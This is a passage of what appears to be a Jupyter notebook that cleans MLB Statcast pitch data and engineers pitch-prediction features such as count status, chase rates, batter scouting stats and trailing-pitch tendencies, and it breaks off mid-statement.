###Markdown Import Install Packages Import Packages ###Code import pandas as pd import numpy as np import random ###Output _____no_output_____ ###Markdown Import Data ###Code filenames = [str(i) + '.pkl' for i in range(2010,2019)] seasons = ['df_' + str(i) for i in range(10,19)] season_dataframes = {} for i in list(zip(filenames, seasons)): path = "Season_pickles/" + i[0] season_dataframes[i[1]] = pd.read_pickle(path, compression='zip') ###Output _____no_output_____ ###Markdown Concatenate Data ###Code pitches = pd.concat(season_dataframes.values()) ###Output _____no_output_____ ###Markdown Clean All Instances **Issue**: There are some instances where no data is recorded**Solution**: Drop these instances from the data ###Code pitches = pitches.dropna(axis = 0, how = 'all') ###Output _____no_output_____ ###Markdown --- Pitch Type **Feature Name**: `pitch_type`**Feature Description**: The type of pitch derived from Statcast. **Issue**: Feature is supposed to contain a 2 character string, but many values (265) are filled with long strings of numerical characters. Example: 160421_181540**Solution**: Replace values longer than 2 characters in lengeth with np.NaN ###Code pitches['pitch_type'] = pitches.apply( lambda row: np.NaN\ if len(str(row['pitch_type'])) > 2\ else row['pitch_type'], axis = 1) ###Output _____no_output_____ ###Markdown **Issue**: Many values of this feature are recorded as 'UN'**Solution**: Replace value with np.NaN ###Code pitches['pitch_type'] = pitches['pitch_type'].replace({'UN':np.nan}) ###Output _____no_output_____ ###Markdown **Issue**: The pitch type feature is filled with NaN values**Solution**: We will create a mapping of a pitchers id and his normalized pitch counts. Using these normalized values as weights we will select a random pitch type and fill the NaN value for that pitcher. We will use df.apply, but this could be time optomized by using series vectorization. ###Code # Create mapping # List fo unique pitcher ID's pitcher_list = pitches['pitcher'].unique().tolist() pitcher_dict = {} for pitcher in pitcher_list: # Pitcher's prior pitch type probabilites pitch_type_weights = pitches[pitches.pitcher == pitcher]\ .pitch_type\ .value_counts(normalize=True) pitcher_dict[pitcher] = pitch_type_weights.to_dict() # Fill nan values pitcher_dict = pd.DataFrame(pitcher_dict).fillna(0).to_dict() # Select replacement pitch type and fill NaN values def pick_a_pitch(pitcher_id): """ Returns a random pitch type label Uses pitchers prior pitch type probabilites as weights """ population = list(pitcher_dict[pitcher_id].keys()) weights = list(pitcher_dict[pitcher_id].values()) return random.choices(population, weights, k=1)[0] # Iterate by instance, fill null values pitches['pitch_type'] = pitches.apply( lambda row: pick_a_pitch(row['pitcher']) \ if pd.isnull(row['pitch_type']) \ else row['pitch_type'], axis = 1) pitch_type_map = {'FA':'fastball', 'FF':'fastball', 'FT':'fastball', 'FC':'fastball', 'FS':'fastball', 'SI':'fastball', 'SF':'fastball', 'SL':'breaking', 'CB':'breaking', 'CU':'breaking', 'SC':'breaking', 'KC':'breaking', 'CH':'offspeed', 'KN':'offspeed', 'EP':'offspeed', 'FO':'breaking', 'PO':'pitchout', 'IN':'pitchout'} pitches['pitch_subtype'] = pitches['pitch_type'] pitches['pitch_type'] = pitches['pitch_type'].map(pitch_type_map) ###Output _____no_output_____ ###Markdown --- Count **Feature**: Count ratio**Description**: The ratio of balls and strikes for the current at bat **Issue**: There are two existing features related to the count. We need to represent the count as a categorical feature.**Solution**: Classifiy the pitchers position reguarding the count (Ahead, Behind, Neutral) ###Code pitches['balls'] = pitches['balls'].replace({4:3, 5:3}) pitches['count_status'] = pitches['balls'].astype('int').astype('str')\ + pitches['strikes'].astype('int').astype('str') count_status_mapping = { '00':'neutral', '21':'neutral', '32':'neutral', '10':'behind', '20':'behind', '30':'behind', '31':'behind', '01':'ahead', '02':'ahead', '11':'ahead', '12':'ahead', '22':'ahead' } pitches['count_status'] = pitches['count_status'].map(count_status_mapping) ###Output _____no_output_____ ###Markdown --- Score Differential **Feature**: Score Differential**Description**: The absolute value of the difference in home team score and away team score ###Code pitches['score_differential'] = abs(pitches['home_score'] - pitches['away_score']) ###Output _____no_output_____ ###Markdown --- Bases Loaded **Feature**: Bases Loaded**Description**: A binary indication of the bases being loaded or not ###Code pitches['on_1b'] = pitches['on_1b'] * 0 + 1 pitches['on_1b'] = pitches['on_1b'].fillna(0) pitches['on_2b'] = pitches['on_2b'] * 0 + 1 pitches['on_2b'] = pitches['on_2b'].fillna(0) pitches['on_3b'] = pitches['on_3b'] * 0 + 1 pitches['on_3b'] = pitches['on_3b'].fillna(0) pitches['bases_loaded'] = pitches['on_1b'] + pitches['on_2b'] + pitches['on_3b'] pitches['bases_loaded'] = pitches['bases_loaded'].apply(lambda x: 1 if x == 3 else 0) ###Output _____no_output_____ ###Markdown --- Swung **Feature**: swung**Description**: Binary feature describing wheather or not the batter swung at the pitch or not ###Code swung = ['foul','hit_into_play','swinging_strike','hit_into_play_no_out', 'hit_into_play_score','foul_tip','swinging_strike_blocked', 'foul_bunt','missed_bunt'] pitches['batter_swung'] = pitches['description'].apply(lambda x: 1 if x in swung else 0) pitches['ball_high'] = pitches['plate_z'] > pitches['sz_top'] pitches['ball_low'] = pitches['plate_z'] < pitches['sz_bot'] pitches['ball_left'] = pitches['plate_x'].apply(lambda x: x < -0.73) pitches['ball_right'] = pitches['plate_x'].apply(lambda x: x > 0.73) pitches['in_strikezone'] = (pitches['ball_high'].astype(int) + pitches['ball_low'].astype(int) + pitches['ball_left'].astype(int) + pitches['ball_right'].astype(int)) pitches['in_strikezone'] = pitches['in_strikezone'].apply( lambda x: 0 if x > 0 else 1) pitches['chased'] = pitches['batter_swung'] - pitches['in_strikezone'] pitches['chased'] = pitches['chased'].apply(lambda x: 1 if x == 1 else 0) ###Output _____no_output_____ ###Markdown Batters Data ###Code sample_batter = list(pitches['batter'].unique())[0] sample_batter batter_df = pitches[pitches['batter'] == sample_batter] batter_df.head() next_probs = batter_df.groupby('pitch_type').size().div(len(batter_df)) next_probs batter_df['pitch_type'].value_counts(normalize = True).to_dict() pd.DataFrame(batter_df.groupby(['pitch_type', 'chased']).size().div(len(batter_df)).div(next_probs, axis=0, level='pitch_type')) batter_dict = {} pitch_types = pitches['pitch_type'].unique().tolist() pitch_type_percentages = batter_df['pitch_type'].value_counts(normalize=True) for pitch_type in pitch_types: batter_dict[pitch_type + '_perc_faced'] = pitch_type_percentages[pitch_type] * 100 batter_dict for pitch_type in pitch_types: cat_df = batter_df[batter_df['pitch_type'] == pitch_type] out_of_strikezone = len(cat_df) - cat_df['in_strikezone'].sum() chased_count = cat_df['chased'].sum() chase_perc = (chased_count / out_of_strikezone) * 100 batter_dict[pitch_type + '_chase_perc'] = chase_perc ball_in_play_count = len(cat_df[cat_df['type'] == 'X']) swung_count = cat_df['batter_swung'].sum() batter_dict[pitch_type + '_bip_swung_perc'] = (ball_in_play_count / swung_count) * 100 batter_dict for pitch_type in pitch_types: ball_in_play_count = len(cat_df[cat_df['type'] == 'X']) swung_count = cat_df['batter_swung'].sum() batter_dict[pitch_type + '_bip_swung_perc'] = (ball_in_play_count / swung_count) * 100 #calc ball in play % for each swing for each pitch cat: ball_in_play_count = len(cat_df[cat_df['type'] == 'X']) #type X means ball hit into play swung_count = cat_df['batter_swung'].sum() #counts all the 1s in the swung column #assign the ball in play % per swing to the batter dict batter_dict[cat + '_bip_swung_perc'] = (ball_in_play_count / swung_count) * 100 def make_batters_df(prior_df): df = prior_df.copy() #make list of the unique batter ids batters = list(df['batter'].unique()) #initialize empty dictionary to store the batter stats batters_dict = {} #set a break flag to False for error-checking brk = False #iterate thru each unique batter for batter in batters: if brk: break #make subset of the df for that batter and assign to variable batter_df batter_df = df[df['batter'] == batter] #assign all pitch categories to list: all_pitch_cats = ['fastball', 'breaking', 'offspeed', 'pitchout'] #assign the pitch categories to a list try: pitch_cats = batter_df['pitch_type'].unique().tolist() except KeyError: print(batter) brk = True #get the normalized value counts of pitches by category that batter has faced vc = batter_df['pitch_type'].value_counts(normalize=True) #initialize empty dict for each batter batter_dict = {} #if there are any pitch categories the batter has not faced, unfaced_cats = list(set(all_pitch_cats) - set(pitch_cats)) for cat in pitch_cats: if brk: break #assign the % of pitches faced by the batter for that category to his batter dict try: batter_dict[cat + '_perc_faced'] = vc[cat] * 100 except TypeError: print(batter) return 1 #continue out of the loop for pitchout category since ball in play stats are NaN if cat == 'pitchout': continue #grab subset of batter df for the pitch category cat_df = batter_df[batter_df['pitch_type'] == cat] #if he has faced less than 100 pitches of that type, add it to unfaced_category and fill w NaN if len(cat_df) < 100: unfaced_cats.append(cat) continue #calculate batters chase % for pitch type category on balls outside the strikezone out_of_strikezone = len(cat_df) - cat_df['in_strikezone'].sum() #num of times ball was out of zone chased_count = cat_df['chased'].sum() #num of times batter chased try: chase_perc = (chased_count / out_of_strikezone) * 100 except ZeroDivisionError: chase_perc = np.nan #assign the chase perc to the batter dict batter_dict[cat + '_chase_perc'] = chase_perc #calc ball in play % for each swing for each pitch cat: ball_in_play_count = len(cat_df[cat_df['type'] == 'X']) #type X means ball hit into play swung_count = cat_df['batter_swung'].sum() #counts all the 1s in the swung column #assign the ball in play % per swing to the batter dict batter_dict[cat + '_bip_swung_perc'] = (ball_in_play_count / swung_count) * 100 #calculate taken strike % taken_strike_count = len(cat_df[(cat_df['in_strikezone'] == 1) & (cat_df['batter_swung'] == 0)]) pitches_in_zone_count = cat_df['in_strikezone'].sum() #counts the 1s in the in zone col #assign to batter_dict batter_dict[cat + '_taken_strike_perc'] = (taken_strike_count / pitches_in_zone_count) * 100 #for each pitch type category, get the batters stats on balls hit in play stats = ['estimated_woba_using_speedangle', 'babip_value', 'iso_value'] for stat in stats: #drop Nans from the stat column and assign to new subset, for each stat stat_cat_df = cat_df.dropna(subset=[stat]) if stat == 'estimated_woba_using_speedangle': #get the mean avg_est_woba avg_est_woba = stat_cat_df['estimated_woba_using_speedangle'].mean() #assign that value to the batters dictionary batter_dict[cat + '_est_woba'] = avg_est_woba if avg_est_woba == np.nan: print(batter) brk = True break elif stat == 'babip_value': avg_babip = stat_cat_df['babip_value'].mean() batter_dict[cat + '_babip'] = avg_babip else: avg_iso_value = stat_cat_df['iso_value'].mean() batter_dict[cat + '_iso_value'] = avg_iso_value #for unfaced or small sample pitch_types: assign NaNs to his dictionary for that category for cat in unfaced_cats: if cat == 'pitchout': batter_dict[cat + '_perc_faced'] = 0 else: batter_dict[cat + '_perc_faced'] = np.nan batter_dict[cat + '_chase_perc'] = np.nan batter_dict[cat + '_bip_swung_perc'] = np.nan batter_dict[cat + '_taken_strike_perc'] = np.nan batter_dict[cat + '_est_woba'] = np.nan batter_dict[cat + '_babip'] = np.nan batter_dict[cat + '_iso_value'] = np.nan #assign the batter dictionary to the main dictionary of all batters batters_dict[batter] = batter_dict if not brk: print('iteration completed successfully') #make df from the batters dict batters_df = pd.DataFrame.from_dict(batters_dict, orient='index') batters_df = batters_df.reset_index().rename(columns={'index':'batter'}) return batters_df batters_df = make_batters_df(pitches) batters_df.head() def downcast_dtypes(df): df = df.copy() int_cols = df.select_dtypes('int').columns.tolist() float_cols = df.select_dtypes('float').columns.tolist() obj_cols = df.select_dtypes('object').columns.tolist() cat_cols = [] for col in obj_cols: if col == 'pitch_type': continue if len(df[col].unique()) < len(df)/2: cat_cols.append(col) ints = df[int_cols].apply(pd.to_numeric,downcast='unsigned') floats = df[float_cols].apply(pd.to_numeric,downcast='float') cats = df[cat_cols].astype('category') df = df.drop(columns=int_cols + float_cols + cat_cols) for d in [ints, floats, cats]: df = pd.concat([df, d], axis=1) return df def pre_process_step1(combined): df = combined.copy() #convert the pitch type for UN (unknown) to np.nan df['pitch_type'] = df['pitch_type'].replace({'UN':np.nan}) #fix some faulty data that has number of balls listed as 4: df['balls'] = df['balls'].replace({4.0: 3.0}) #count, count_cat, score_diff, on_base 1/0, bases_loaded df = make_game_features(df) #batter_swung, in_strikezone, chased df = make_strikezone_swung_and_chase_features(df) #get aggregate pitcher %s dict from prior data: pitcher_dict = gen_pitcher_percentages(df) #fil the NaNs for pitch_type using randomized guess from pitcher tendencies df = fill_pitch_type_nans(df, pitcher_dict) #pitch_type category feature df = make_pitch_type_cat(df) return df #pass in list of periods to update the data (and fill NaNs) using prior aggregates: def pre_process_step2(pre_processed_step1, start_dates, end_dates): df = pre_processed_step1.copy() #initialize empty list to store dfs (concat them together later) df_list = [] #iterate over each period for i in range(len(start_dates)): #make the prior and current dfs: prior_df = df[df['game_date'] < start_dates[i]] current_df = df[(df['game_date'] >= start_dates[i]) & (df['game_date'] <= end_dates[i])] #add the batter scouting report batters_df = make_batters_df(prior_df) current_df = pd.merge(current_df, batters_df, how='left', on='batter') #append the df to the list df_list.append(current_df) step2_df = pd.concat(df_list, sort=False) return step2_df def get_pitch_tendencies(pitcher_df): #assign the normalized value counts for this pitchers pitch types to a dictionary pitcher_tendencies_overall = pitcher_df['pitch_type'].value_counts(normalize=True).to_dict() #initialize empty dict for count categories tendencies pitcher_tendencies_by_count = {} #loop over each count category and get the pitchers tendencies and add to the dict for cat in pitcher_df['count_cat'].unique().tolist(): subset = pitcher_df[pitcher_df['count_cat'] == cat] pitcher_tendencies_by_count[cat] = subset['pitch_type'].value_counts(normalize=True).to_dict() return pitcher_tendencies_overall, pitcher_tendencies_by_count def make_tendency_features(pitcher_df, pitcher_tendencies_overall, pitcher_tendencies_by_count): df = pitcher_df.copy() pitch_types = pitcher_tendencies_overall.keys() for pitch_type in pitch_types: overall_feature = 'overall_' + pitch_type + '_perc' count_cat_feature = 'count_cat_' + pitch_type + '_perc' def get_overall_perc(x): return pitcher_tendencies_overall[x] def get_by_count_perc(x): try: return pitcher_tendencies_by_count[x][pitch_type] except KeyError: return 0 df[overall_feature] = pitch_type df[overall_feature] = df[overall_feature].apply(get_overall_perc) df[count_cat_feature] = df['count_cat'].apply(get_by_count_perc) return df start_dates = ['2018-03-29', '2018-05-01', '2018-06-01', '2018-07-01', '2018-08-01', '2018-09-01', '2019-03-28', '2019-05-01', '2019-06-01', '2019-07-01', '2019-08-01'] end_dates = ['2018-04-30', '2018-05-31', '2018-06-30', '2018-07-31', '2018-08-31', '2018-10-01', '2019-04-30', '2019-05-31', '2019-06-30', '2019-07-31', '2019-08-31'] def add_pitcher_scouting_report(pitcher_df, pitcher_df17, start_dates, end_dates): df = pd.concat([pitcher_df, pitcher_df17], sort=False) #initialize empty list to store dfs (concat them together later) df_list = [] #iterate over each period for i in range(len(start_dates)): #make the prior and current dfs: prior_df = df[df['game_date'] < start_dates[i]] current_df = df[(df['game_date'] >= start_dates[i]) & (df['game_date'] <= end_dates[i])] #get the pitch tendencies from prior: pitcher_tendencies_overall, pitcher_tendencies_by_count = get_pitch_tendencies(prior_df) #make the pitch tendencies features on current: current_df = make_tendency_features(current_df, pitcher_tendencies_overall, pitcher_tendencies_by_count) #append the df to the list df_list.append(current_df) df = pd.concat(df_list, sort=False) return df def make_game_batting_order(game_df): game_df = game_df.sort_values(by=['at_bat_number', 'pitch_number']) all_batters = game_df['batter'].unique().tolist() #re-set the at_bat_number for the game to be sequential starting at 1 at_bat_keys = game_df['at_bat_number'].unique().tolist() at_bat_values = range(1, len(at_bat_keys)+1) at_bat_map = dict(zip(at_bat_keys, at_bat_values)) game_df['at_bat_number'] = game_df['at_bat_number'].replace(at_bat_map) #get the first 9 batter ids first_9_batter_subset = game_df[game_df['at_bat_number'] < 10] first_9_batters = first_9_batter_subset['batter'].unique().tolist() #map the batter id to batting order position 1-9 batting_order_map = dict(zip(first_9_batters, range(1,10))) #for anyone else who bats later in the game, assign 'PH' (pinch hitter) to their batting order slot other_batters = list(set(all_batters) - set(first_9_batters)) if len(other_batters) > 0: for batter in other_batters: batting_order_map[batter] = 'PH' try: game_df['batting_order_slot'] = game_df['batter'].apply(lambda x: batting_order_map[x]) except KeyError: game_df = None return game_df game_df['pitcher_AB'] = game_df['batter'].apply(lambda x: True if x in pitcher_list else False) game_df['batting_order_slot'] = game_df['batting_order_slot'].where(game_df['pitcher_AB'] == False, other='pitcher') return game_df def make_game_pitchcount_and_trailing_pitch_features(pitcher_df, pitcher_list): df = pitcher_df.copy() print('#pitches in df before: ' + str(len(df))) pitcher_tendencies_overall, pitcher_tendencies_by_count = get_pitch_tendencies(df) games = df['game_pk'].unique().tolist() #take the first game and make the pitch count feature first_game_df = df[df['game_pk'] == games[0]].copy() first_game_df['pitch_count'] = range(1, first_game_df.shape[0] + 1) #make the L1_pitch type feature: first_game_df['L1_pitch_type'] = first_game_df['pitch_type'].shift(periods=1) first_game_df['L1_pitch_result'] = first_game_df['type'].shift(periods=1) first_game_df['L1_pitch_result'] = first_game_df['L1_pitch_result'].replace({np.nan:'first pitch'}) first_game_df['L1_pitch_zone'] = first_game_df['zone'].shift(periods=1) first_game_df['L1_pitch_zone'] = first_game_df['L1_pitch_zone'].fillna(-1) #overall strike % (to fill in for first 5 pitches L5_strike_perc) overall_strike_perc = df['type'].value_counts(normalize=True)['S'] * 100 #make the trailing 5 pitches: for index, row in first_game_df.iterrows(): #fill NaNs for L1_pitch using same method as when pitch_type was missing if row['pitch_count'] == 1: random_pitch = random.choices(population=list(pitcher_tendencies_overall.keys()), weights=list(pitcher_tendencies_overall.values()), k=1)[0] first_game_df.at[index, 'L1_pitch_type'] = random_pitch #for the first 5 rows, use overall pitcher tendencies if row['pitch_count'] < 6: #fill with overall tendencies for pitch in list(pitcher_tendencies_overall.keys()): feature = 'L5_' + pitch + '_perc' first_game_df.at[index, feature] = pitcher_tendencies_overall[pitch] * 100 #strike % first_game_df.at[index, 'L5_strike_perc'] = overall_strike_perc else: current_pitch = first_game_df.at[index, 'pitch_count'] #make a subset of the prev 5 pitches subset = first_game_df[(first_game_df['pitch_count'] > current_pitch - 6) & (first_game_df['pitch_count'] < current_pitch)] #grab the value count percentages for the last 5 pitches subset_percentages = subset['pitch_type'].value_counts(normalize=True).to_dict() try: L5_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100 except KeyError: L5_strike_perc = 0 first_game_df.at[index, 'L5_strike_perc'] = L5_strike_perc #iterate over all possible pitch types this pitcher throws: for pitch in list(pitcher_tendencies_overall.keys()): feature = 'L5_' + pitch + '_perc' #if he has thrown that pitch type in last 5 try: first_game_df.at[index, feature] = subset_percentages[pitch] * 100 #except for when he hasnt thrown that type in last 5 except: first_game_df.at[index, feature] = 0 #apply the battting order features to the game: first_game_df = make_game_batting_order(first_game_df) #iterate the same process for the rest of his games: for game in games[1:]: game_df = df[df['game_pk'] == game].copy() #get df for that game only game_df['pitch_count'] = range(1, game_df.shape[0] + 1) #make the pitch count for the game game_df['L1_pitch_type'] = game_df['pitch_type'].shift(periods=1) game_df['L1_pitch_result'] = game_df['type'].shift(periods=1) game_df['L1_pitch_result'] = game_df['L1_pitch_result'].replace({np.nan:'first pitch'}) game_df['L1_pitch_zone'] = game_df['zone'].shift(periods=1) game_df['L1_pitch_zone'] = game_df['L1_pitch_zone'].fillna(0) #make the trailing 5 pitches: for index, row in game_df.iterrows(): #fill NaNs for L1_pitch using same method as when pitch_type was missing if row['pitch_count'] == 1: random_pitch = random.choices(population=list(pitcher_tendencies_overall.keys()), weights=list(pitcher_tendencies_overall.values()), k=1)[0] game_df.at[index, 'L1_pitch_type'] = random_pitch if row['pitch_count'] < 6: #fill with overall tendencies for pitch in list(pitcher_tendencies_overall.keys()): feature = 'L5_' + pitch + '_perc' game_df.at[index, feature] = pitcher_tendencies_overall[pitch] * 100 #strike % game_df.at[index, 'L5_strike_perc'] = overall_strike_perc else: current_pitch = game_df.at[index, 'pitch_count'] subset = game_df[(game_df['pitch_count'] > current_pitch - 6) & (game_df['pitch_count'] < current_pitch)] subset_percentages = subset['pitch_type'].value_counts(normalize=True).to_dict() try: L5_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100 except KeyError: L5_strike_perc = 0 game_df.at[index, 'L5_strike_perc'] = L5_strike_perc for pitch in list(pitcher_tendencies_overall.keys()): feature = 'L5_' + pitch + '_perc' try: game_df.at[index, feature] = subset_percentages[pitch] * 100 except: game_df.at[index, feature] = 0 #apply the battting order features to the game: game_df = make_game_batting_order(game_df) if game_df.empty: print('skipping game because of bat data: ' + str(game)) continue #concatenate that game w/ updated pitch count and trailing pitches w/ prev games if game_df['game_pk'].values[0] == games[1]: new_df = pd.concat([first_game_df, game_df]) #concat the game_df w/ the first game else: new_df = pd.concat([new_df, game_df]) #concat the game_df w/ the previous games print('# pitches in df after: ' + str(len(new_df))) return new_df batter_cols = ['fastball_perc_faced','fastball_chase_perc','fastball_bip_swung_perc', 'fastball_taken_strike_perc', 'fastball_est_woba', 'fastball_babip', 'fastball_iso_value', 'breaking_perc_faced', 'breaking_chase_perc', 'breaking_bip_swung_perc', 'breaking_taken_strike_perc', 'breaking_est_woba', 'breaking_babip', 'breaking_iso_value', 'offspeed_perc_faced', 'offspeed_chase_perc', 'offspeed_bip_swung_perc', 'offspeed_taken_strike_perc', 'offspeed_est_woba', 'offspeed_babip', 'offspeed_iso_value', 'pitchout_perc_faced'] def fill_batting_nans(pitcher_df, batting_order_slot_map): df = pitcher_df.copy() for slot in df['batting_order_slot'].unique().tolist(): subset = df[df['batting_order_slot'] == slot].copy() df = df.drop(subset.index) for col in batter_cols: subset[col] = subset[col].fillna(batting_order_slot_map[slot][col]) df = pd.concat([df, subset]) print('finished w/ slot: ' + str(slot)) return df def get_left_right_pitch_tendencies(pitcher_df): #split the df into left hand and right handed batters left = pitcher_df[pitcher_df['stand'] == 'L'].copy() right = pitcher_df[pitcher_df['stand'] == 'R'].copy() #assign the normalized value counts for this pitchers pitch types to a dictionary overall_left = left['pitch_cat'].value_counts(normalize=True).to_dict() overall_right = right['pitch_cat'].value_counts(normalize=True).to_dict() #initialize empty dict for count categories tendencies by_count_left = {} by_count_right = {} #loop over each count category and get the pitchers tendencies and add to the dict for cat in pitcher_df['count_cat'].unique().tolist(): left_subset = left[left['count_cat'] == cat] right_subset = right[right['count_cat'] == cat] by_count_left[cat] = left_subset['pitch_cat'].value_counts(normalize=True).to_dict() by_count_right[cat] = right_subset['pitch_cat'].value_counts(normalize=True).to_dict() return overall_left, overall_right, by_count_left, by_count_right def make_tendency_features(pitcher_df, overall_left, overall_right, by_count_left, by_count_right): #helper functions to vectorize w/ df.apply(): def get_overall_left_perc(x): return overall_left[x] * 100 def get_overall_right_perc(x): return overall_right[x] * 100 def get_by_count_left_perc(x): try: return by_count_left[x][pitch_type] * 100 except KeyError: return 0 def get_by_count_right_perc(x): try: return by_count_right[x][pitch_type] * 100 except KeyError: return 0 left = pitcher_df[pitcher_df['stand'] == 'L'].copy() right = pitcher_df[pitcher_df['stand'] == 'R'].copy() pitch_types_left = overall_left.keys() pitch_types_right = overall_right.keys() #Left for pitch_type in pitch_types_left: overall_feature = 'overall_' + pitch_type + '_perc' count_cat_feature = 'count_cat_' + pitch_type + '_perc' left[overall_feature] = pitch_type left[overall_feature] = left[overall_feature].apply(get_overall_left_perc) left[count_cat_feature] = left['count_cat'].apply(get_by_count_left_perc) #Right for pitch_type in pitch_types_right: overall_feature = 'overall_' + pitch_type + '_perc' count_cat_feature = 'count_cat_' + pitch_type + '_perc' right[overall_feature] = pitch_type right[overall_feature] = right[overall_feature].apply(get_overall_right_perc) right[count_cat_feature] = right['count_cat'].apply(get_by_count_right_perc) return pd.concat([left,right], sort=False).sort_values(by=['game_date', 'game_pk', 'at_bat_number', 'pitch_number']) def add_pitcher_scouting_report(pitcher_df, pitcher_df17, start_dates, end_dates): df = pd.concat([pitcher_df, pitcher_df17], sort=False) #initialize empty list to store dfs (concat them together later) df_list = [] #iterate over each period for i in range(len(start_dates)): #make the prior and current dfs: prior_df = df[df['game_date'] < start_dates[i]] current_df = df[(df['game_date'] >= start_dates[i]) & (df['game_date'] <= end_dates[i])].copy() #get the pitch tendencies from prior: overall_left, overall_right, by_count_left, by_count_right = get_left_right_pitch_tendencies(prior_df) #make the pitch tendencies features on current: current_df = make_tendency_features(current_df, overall_left, overall_right, by_count_left, by_count_right) #append the df to the list df_list.append(current_df) df = pd.concat(df_list, sort=False) return df def make_game_batting_order(game_df): game_df = game_df.sort_values(by=['at_bat_number', 'pitch_number']) all_batters = game_df['batter'].unique().tolist() #re-set the at_bat_number for the game to be sequential starting at 1 at_bat_keys = game_df['at_bat_number'].unique().tolist() at_bat_values = range(1, len(at_bat_keys)+1) at_bat_map = dict(zip(at_bat_keys, at_bat_values)) game_df['at_bat_number'] = game_df['at_bat_number'].replace(at_bat_map) #get the first 9 batter ids first_9_batter_subset = game_df[game_df['at_bat_number'] < 10] first_9_batters = first_9_batter_subset['batter'].unique().tolist() #map the batter id to batting order position 1-9 batting_order_map = dict(zip(first_9_batters, range(1,10))) #for anyone else who bats later in the game, assign 'PH' (pinch hitter) to their batting order slot other_batters = list(set(all_batters) - set(first_9_batters)) if len(other_batters) > 0: for batter in other_batters: batting_order_map[batter] = 'PH' try: game_df['batting_order_slot'] = game_df['batter'].apply(lambda x: batting_order_map[x]) except KeyError: game_df = None return game_df game_df['pitcher_AB'] = game_df['batter'].apply(lambda x: True if x in pitcher_list else False) game_df['batting_order_slot'] = game_df['batting_order_slot'].where(game_df['pitcher_AB'] == False, other='pitcher') return game_df def get_pitch_tendencies(pitcher_df): #assign the normalized value counts for this pitchers pitch types to a dictionary pitcher_tendencies_overall = pitcher_df['pitch_cat'].value_counts(normalize=True).to_dict() #initialize empty dict for count categories tendencies pitcher_tendencies_by_count = {} #loop over each count category and get the pitchers tendencies and add to the dict for cat in pitcher_df['count_cat'].unique().tolist(): subset = pitcher_df[pitcher_df['count_cat'] == cat] pitcher_tendencies_by_count[cat] = subset['pitch_cat'].value_counts(normalize=True).to_dict() return pitcher_tendencies_overall, pitcher_tendencies_by_count def make_game_pitchcount_and_trailing_pitch_features_and_batting_order(pitcher_df, pitcher_list): df = pitcher_df.copy() all_games = [] print('#pitches in df before: ' + str(len(df))) pitcher_tendencies_overall, pitcher_tendencies_by_count = get_pitch_tendencies(df) games = df['game_pk'].unique().tolist() for game in games: #take the first game and make the pitch count feature game_df = df[df['game_pk'] == game].copy() game_df['pitch_count'] = range(1, game_df.shape[0] + 1) #make the L1_pitch type feature: game_df['L1_pitch_type'] = game_df['pitch_cat'].shift(periods=1) game_df['L1_pitch_result'] = game_df['type'].shift(periods=1) game_df['L1_pitch_result'] = game_df['L1_pitch_result'].replace({np.nan:'first pitch'}) game_df['L1_pitch_zone'] = game_df['zone'].shift(periods=1) game_df['L1_ball_high'] = game_df['ball_high'].shift(periods=1) game_df['L1_ball_low'] = game_df['ball_low'].shift(periods=1) game_df['L1_ball_left'] = game_df['ball_left'].shift(periods=1) game_df['L1_ball_right'] = game_df['ball_right'].shift(periods=1) game_df[['L1_pitch_zone', 'L1_ball_high', 'L1_ball_low', 'L1_ball_left', 'L1_ball_right']] = game_df[['L1_pitch_zone', 'L1_ball_high', 'L1_ball_low', 'L1_ball_left', 'L1_ball_right']].fillna(-1) #game_df['L1_pitch_zone'] = game_df['L1_pitch_zone'].fillna(-1) #overall strike % (to fill in for first 5 pitches L5_strike_perc) overall_strike_perc = df['type'].value_counts(normalize=True)['S'] * 100 #make the trailing 5 pitches: for index, row in game_df.iterrows(): #fill NaNs for L1_pitch using same method as when pitch_type was missing if row['pitch_count'] == 1: random_pitch = random.choices(population=list(pitcher_tendencies_overall.keys()), weights=list(pitcher_tendencies_overall.values()), k=1)[0] game_df.at[index, 'L1_pitch_type'] = random_pitch #for the first 5 rows, use overall pitcher tendencies if row['pitch_count'] < 6: #fill with overall tendencies for pitch in list(pitcher_tendencies_overall.keys()): feature = 'L5_' + pitch + '_perc' game_df.at[index, feature] = pitcher_tendencies_overall[pitch] * 100 feature = 'L15_' + pitch + '_perc' game_df.at[index, feature] = pitcher_tendencies_overall[pitch] * 100 #strike % game_df.at[index, 'L5_strike_perc'] = overall_strike_perc game_df.at[index, 'L15_strike_perc'] = overall_strike_perc else: current_pitch = game_df.at[index, 'pitch_count'] #make a subset of the prev 5 pitches subset = game_df[(game_df['pitch_count'] > current_pitch - 6) & (game_df['pitch_count'] < current_pitch)] #grab the value count percentages for the last 5 pitches subset_percentages = subset['pitch_cat'].value_counts(normalize=True).to_dict() try: L5_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100 except KeyError: L5_strike_perc = 0 game_df.at[index, 'L5_strike_perc'] = L5_strike_perc #iterate over all possible pitch types this pitcher throws: for pitch in list(pitcher_tendencies_overall.keys()): feature = 'L5_' + pitch + '_perc' #if he has thrown that pitch type in last 5 try: game_df.at[index, feature] = subset_percentages[pitch] * 100 #except for when he hasnt thrown that type in last 5 except: game_df.at[index, feature] = 0 if row['pitch_count'] < 16: #make a subset of the prev 15 pitches subset = game_df[(game_df['pitch_count'] < current_pitch)] #grab the value count percentages for the last 15 pitches subset_percentages = subset['pitch_cat'].value_counts(normalize=True).to_dict() try: L15_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100 except KeyError: L15_strike_perc = 0 game_df.at[index, 'L15_strike_perc'] = L15_strike_perc #iterate over all possible pitch types this pitcher throws: for pitch in list(pitcher_tendencies_overall.keys()): feature = 'L15_' + pitch + '_perc' #if he has thrown that pitch type in last 15 try: game_df.at[index, feature] = subset_percentages[pitch] * 100 #except for when he hasnt thrown that type in last 5 except: game_df.at[index, feature] = 0 else: #make a subset of the prev 15 pitches subset = game_df[(game_df['pitch_count'] > current_pitch - 16) & (game_df['pitch_count'] < current_pitch)] #grab the value count percentages for the last 5 pitches subset_percentages = subset['pitch_cat'].value_counts(normalize=True).to_dict() try: L15_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100 except KeyError: L15_strike_perc = 0 game_df.at[index, 'L15_strike_perc'] = L15_strike_perc #iterate over all possible pitch types this pitcher throws: for pitch in list(pitcher_tendencies_overall.keys()): feature = 'L15_' + pitch + '_perc' #if he has thrown that pitch type in last 5 try: game_df.at[index, feature] = subset_percentages[pitch] * 100 #except for when he hasnt thrown that type in last 5 except: game_df.at[index, feature] = 0 #apply the battting order features to the game: game_df = 